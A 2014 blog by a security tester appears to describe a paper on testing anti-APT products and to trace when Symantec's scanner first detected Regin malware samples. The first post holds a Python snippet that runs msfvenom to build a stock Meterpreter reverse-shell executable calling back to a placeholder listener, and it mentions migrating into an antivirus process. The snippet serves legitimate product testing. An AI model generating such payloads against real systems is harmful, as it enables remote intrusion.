Tuesday, 25 November 2014

Effectively testing APT defences

There is a need to test products that claim to detect and protect against advanced threats.

When security products make incredible claims, we should make a strong effort to challenge and, where possible, validate those claims.

Over the past year and a half I have discussed testing with a range of vendors, testers and potential customers of such products. These discussions have ranged from very positive to, in the case of some vendors, extremely defensive and illogical.

To put it this way: we have some anti-APT kit in the lab ready for such a test, but equipment from one or two important vendors remains elusive, to say the least.

Such testing has also been a regular point of debate at the Anti-Malware Testing Standards Organization, of which I am currently the Chair, and so two AMTSO colleagues (Richard Ford, Florida Institute of Technology and Gabor Szappanos, Sophos) joined me to write a paper called Effectively testing APT defences.

Gabor and I presented the paper at the AVAR 2014 conference in Sydney, held from the 12th to the 14th of November 2014.

The paper examines some of the problems that surround testing such technologies (real and merely perceived) and questions the definition of the term "APT" in a constructive way. It also walks the reader through an example of a targeted attack and notes where certain types of testing would be deficient when using such an attack as a test case.

In the presentation, but not the paper, I also demonstrated how a 'baseline' set of tests, using unmodified Metasploit-based attacks, made mincemeat of some well-known anti-malware products. One enterprise solution stopped four out of 25 threats. We were able to obtain reverse shells in 21 cases and, just as an experiment, migrated into the anti-malware agent's own process.
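
As a rough illustration of what 'unmodified' means here, the sketch below shows how one such baseline sample could be generated by driving msfvenom from Python. The listener address, port and file name are placeholders rather than the test's real configuration, and the process migration mentioned above would be done with Meterpreter's built-in migrate command once a session is established.

    import subprocess

    # Placeholders only: not the configuration used in the actual test.
    LHOST = "192.0.2.10"
    LPORT = "4444"

    # Generate a stock Meterpreter reverse-shell executable with msfvenom.
    # No encoder, packer or other evasion is applied, which is what makes
    # this a 'zero'-level (minimal skill/resource) baseline attack.
    subprocess.run(
        [
            "msfvenom",
            "-p", "windows/meterpreter/reverse_tcp",  # stock, unmodified payload
            "LHOST=" + LHOST,
            "LPORT=" + LPORT,
            "-f", "exe",                 # plain PE executable, no obfuscation
            "-o", "baseline_sample.exe",
        ],
        check=True,
    )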

This basic test demonstrated that a range of tools, tactics and techniques could be used to test different levels of protection from actors ranging from 'zero' (almost no skill/resources) to 'Neo' (effectively unlimited skills/resources).

Not every tester is capable of 'Neo' testing and some may not wish to conduct 'zero' testing, but as long as the report explains what approaches were taken and why, it's hard to understand why an anti-APT vendor would object to tests that could be considered "too easy."

While the paper does not provide a single, ultimate methodology for anti-APT testing, I believe it outlines some valid approaches, none of which is "do not test!"

Regin: When did protection start?

Regin, advanced malware that is most likely a government espionage tool, is making headlines.

This is because it's a very well-constructed set of tools and also because observers are surprised at how successful it was. It also targeted GSM networks, which is novel.

The big question is, how could the major anti-malware firms have missed this threat for so long?

Or, one might ask, did they really miss it or quietly detect it?

Some people appear to believe that, as Regin was probably created and used by Western governments, Western anti-malware companies colluded to ignore the threat.

Symantec seems to have been slow to notice Regin: its write-up of Backdoor.Regin gives a discovery date of December 2013, much later than March 2011, when Microsoft updated its definitions to include Regin.A.

In an effort to find a history of Symantec's detection of this malware I obtained an archive of Regin samples from security researcher Claudio Guarnieri and asked the kind folk at VirusTotal to discover when, if ever, Symantec's scanner first detected each sample.
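
For anyone wanting to attempt something similar, it is worth knowing that the public VirusTotal API (version 2) returns each engine's verdict only from the most recent scan of a file, which is why the historical first-detection dates required help from VirusTotal's staff. Still, a minimal Python sketch along the following lines shows how per-engine verdicts are exposed; the API key and sample hashes are placeholders.

    import json
    import time
    import urllib.parse
    import urllib.request

    API_KEY = "YOUR_VT_API_KEY"  # placeholder: a real VirusTotal key is required
    REPORT_URL = "https://www.virustotal.com/vtapi/v2/file/report"

    def symantec_verdict(file_hash):
        """Return (scan date, Symantec's verdict) from the latest VirusTotal
        report for a sample, or None if VirusTotal has never seen it."""
        params = urllib.parse.urlencode({"apikey": API_KEY, "resource": file_hash})
        with urllib.request.urlopen(REPORT_URL + "?" + params) as response:
            report = json.load(response)
        if report.get("response_code") != 1:
            return None  # sample unknown to VirusTotal
        result = report.get("scans", {}).get("Symantec", {}).get("result")
        return report.get("scan_date"), result

    # Placeholder list standing in for the hashes of the Regin archive.
    sample_hashes = ["<sha256 of a Regin sample>"]
    for file_hash in sample_hashes:
        print(file_hash, symantec_verdict(file_hash))
        time.sleep(15)  # stay within the public API's 4 requests/minute limit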

Before we look at these results I want to be clear about what they mean and what they do not, because VirusTotal data is easily abused and dodgy conclusions are readily reached.

The table below indicates that Symantec's technology was capable of detecting most of the samples as at least suspicious from February 2010. From March 2011 it classified them more specifically, as a 'Trojan'.

Only yesterday (24th November 2014) did it officially label the threat as 'Regin', coinciding with its public announcement of the malware.

Usually the problem with using VirusTotal is that someone will upload some files, show that product X failed to recognise them and then conclude that the product, or the entire anti-virus industry, is useless.

In this case we can see dates relating to when the product detected the files as threats. Possibly the product would have protected against these files even earlier, and possibly those that appear to have been missed (Classification = 'nothing') would have been stopped by some other layer of protection not related to file signatures.

So I see the following as a worst-case scenario. Symantec's scanner recognised most of these files as threats from around 2011 onwards. Maybe it was capable of stopping them and maybe not - we can't know that for sure. But it's fair to assume that if a signature-based scanner can recognise a file then it will probably generate an alert at the very least.

[Table: Symantec's classification of each Regin sample over time ('suspicious', 'Trojan', 'Regin' or 'nothing'), as recorded by VirusTotal]

I've focussed on Symantec simply because it was the first to announce the Regin malware, minutes before other vendors joined in.